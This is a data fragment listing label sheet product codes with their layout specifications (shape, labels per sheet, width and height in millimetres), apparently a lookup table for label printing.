{'DPS08': {'id': 'LP8/105S', 'shape': 'rectangle', 'number': 8, 'width': 105, 'height': 71}},
{'DPS10': {'id': 'LP10/105', 'shape': 'rectangle', 'number': 10, 'width': 105, 'height': 59.6}},
{'DPS16': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'DPS24': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'DPS30': {'id': 'LP30/70', 'shape': 'rectangle', 'number': 30, 'width': 70, 'height': 30}},
    {'DPS04': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'E3210': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'E3211': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'E3212': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'E3230': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'E3410': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'E3411': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'E3411': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'J2356': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J2356': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J2356': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4720': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'J4721': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'J4722': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'J4773': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J4774': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'J4775': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4775': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4775': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J4776': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'J4791': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'J4792': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'J5101': {'id': 'LP20/38', 'shape': 'rectangle', 'number': 20, 'width': 38, 'height': 69}},
{'J5102': {'id': 'LP14/63', 'shape': 'rectangle', 'number': 14, 'width': 63.5, 'height': 38}},
{'J5103': {'id': 'LP10/38', 'shape': 'rectangle', 'number': 10, 'width': 38, 'height': 135}},
{'J6115': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8159': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J8160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'J8161': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'J8162': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'J8163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'J8164': {'id': 'LP12/63', 'shape': 'rectangle', 'number': 12, 'width': 45.7, 'height': 72}},
{'J8165': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'J8165': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'J8166': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'J8167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'J8168': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'J8168': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'J8169': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'J8170': {'id': 'LP24/134', 'shape': 'rectangle', 'number': 24, 'width': 134, 'height': 11}},
{'J8171': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'J8172': {'id': 'LP18/100', 'shape': 'rectangle', 'number': 18, 'width': 100, 'height': 30}},
{'J8173': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'J8173': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'J8177': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'J8359': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J8360': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'J8361': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'J8362': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'J8363': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'J8364': {'id': 'LP12/63', 'shape': 'rectangle', 'number': 12, 'width': 45.7, 'height': 72}},
{'J8365': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'J8365': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'J8366': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'J8367': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'J8368': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'J8368': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'J8369': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'J8371': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'J8551': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'J8559': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'J8560': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'J8562': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'J8563': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'J8565': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'J8565': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'J8567': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8567': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8567': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8570': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8587': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8587': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8587': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'J8651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'J8654': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'J8655': {'id': 'LP12/89', 'shape': 'round_rectangle', 'number': 12, 'width': 89, 'height': 42}},
{'J8656': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'J8657': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'J8658': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'J8659': {'id': 'LP270/18', 'shape': 'rectangle', 'number': 270, 'width': 17.8, 'height': 10}},
{'J8660': {'id': 'LPCD116', 'shape': 'circle', 'number': 2, 'width': 116, 'height': 116}},
{'J8666': {'id': 'LP10/70', 'shape': 'rectangle', 'number': 10, 'width': 70, 'height': 52}},
{'J8671': {'id': 'LP12/76', 'shape': 'rectangle', 'number': 12, 'width': 76.2, 'height': 46.4}},
{'J8674': {'id': 'LP16/145', 'shape': 'rectangle', 'number': 16, 'width': 145, 'height': 17}},
{'J8676': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8743': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8751': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'J8756V': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'J8766': {'id': 'LP10/70', 'shape': 'rectangle', 'number': 10, 'width': 70, 'height': 52}},
{'J8770': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8771': {'id': 'LP12/76', 'shape': 'rectangle', 'number': 12, 'width': 76.2, 'height': 46.4}},
{'J8774': {'id': 'LP16/145', 'shape': 'rectangle', 'number': 16, 'width': 145, 'height': 17}},
{'J8776': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8777': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'J8778': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L3415': {'id': 'LP24/40R', 'shape': 'circle', 'number': 24, 'width': 40, 'height': 40}},
{'L4730': {'id': 'LP270/18', 'shape': 'rectangle', 'number': 270, 'width': 17.8, 'height': 10}},
{'L4731': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L4733': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L4734': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L4734': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L4735': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4735': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4735': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4736': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L4737': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L4743': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L4744': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'L4760': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4761': {'id': 'LP4/192', 'shape': 'rectangle', 'number': 4, 'width': 192, 'height': 62}},
{'L4762': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4763': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4764': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4765': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L4770': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L4772': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L4773': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L4774': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L4775': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4775': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4775': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L4776': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L4778': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L4784': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L4790': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L4791': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L4792': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L4793': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L5103': {'id': 'LP10/38', 'shape': 'rectangle', 'number': 10, 'width': 38, 'height': 135}},
{'L6003': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6004': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6005': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6005': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6005': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6006': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6006': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6006': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6007': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6007': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6007': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6008': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6009': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6011': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6012': {'id': 'LP10/96', 'shape': 'rectangle', 'number': 10, 'width': 96, 'height': 50.8}},
{'L6013': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6013': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6013': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6015': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6023': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L6025': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'L6032': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6033': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6034': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6035': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6036': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6037': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6038': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6039': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6040': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6041': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6043': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6044': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6045': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6046': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6047': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6048': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6049': {'id': 'LP189/25', 'shape': 'rectangle', 'number': 189, 'width': 25.4, 'height': 10}},
{'L6050': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6050': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6051': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6051': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6052': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6052': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6053': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L6053': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L6054': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6055': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6056': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6057': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L6103': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6105': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6111': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6111': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6111': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L6112': {'id': 'LP24/40R', 'shape': 'circle', 'number': 24, 'width': 40, 'height': 40}},
{'L6113': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L6114': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'L6117': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'L6140': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L6141': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L6145': {'id': 'LP40/45', 'shape': 'rectangle', 'number': 40, 'width': 45.7, 'height': 25.4}},
{'L6146': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7051': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7060': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7063': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7065': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7068': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7068': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7069': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7074': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'L7077': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'L7084': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'L7102': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'L7159': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7159X': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7160X': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7161': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'L7161X': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'L7162': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7162X': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7163B': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163R': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163X': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7163Y': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7164': {'id': 'LP12/63', 'shape': 'rectangle', 'number': 12, 'width': 45.7, 'height': 72}},
{'L7165': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7165': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7165X': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7165X': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7166': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7166X': {'id': 'LP6/99', 'shape': 'rectangle', 'number': 6, 'width': 99.1, 'height': 93.1}},
{'L7167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'L7168': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7168': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7169': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'L7170': {'id': 'LP24/134', 'shape': 'rectangle', 'number': 24, 'width': 134, 'height': 11}},
{'L7171A': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171B': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171G': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171R': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7171Y': {'id': 'LP4/200', 'shape': 'rectangle', 'number': 4, 'width': 200, 'height': 60}},
{'L7172': {'id': 'LP18/100', 'shape': 'rectangle', 'number': 18, 'width': 100, 'height': 30}},
{'L7173B': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7173B': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7173': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7173': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7173X': {'id': 'LP10/95OV', 'shape': 'oval', 'number': 10, 'width': 95, 'height': 53}},
{'L7173X': {'id': 'LP10/99', 'shape': 'rectangle', 'number': 10, 'width': 99.1, 'height': 57}},
{'L7177': {'id': 'LP12/99', 'shape': 'rectangle', 'number': 12, 'width': 99.1, 'height': 42.3}},
{'L7263': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7263R': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7263Y': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7363P': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7409': {'id': 'LP51/57', 'shape': 'rectangle', 'number': 51, 'width': 57, 'height': 15}},
{'L7551': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'L7556': {'id': 'LP84/46', 'shape': 'rectangle', 'number': 84, 'width': 46, 'height': 11.1}},
{'L7559': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'L7560': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'L7562': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'L7563': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'L7565': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'L7565': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'L7567': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7567': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7567': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'L7568': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'L7568': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7630': {'id': 'LP12/64R', 'shape': 'circle', 'number': 12, 'width': 63.5, 'height': 63.5}},
{'L7636': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'L7644': {'id': 'LP9/133', 'shape': 'rectangle', 'number': 9, 'width': 133, 'height': 29.6}},
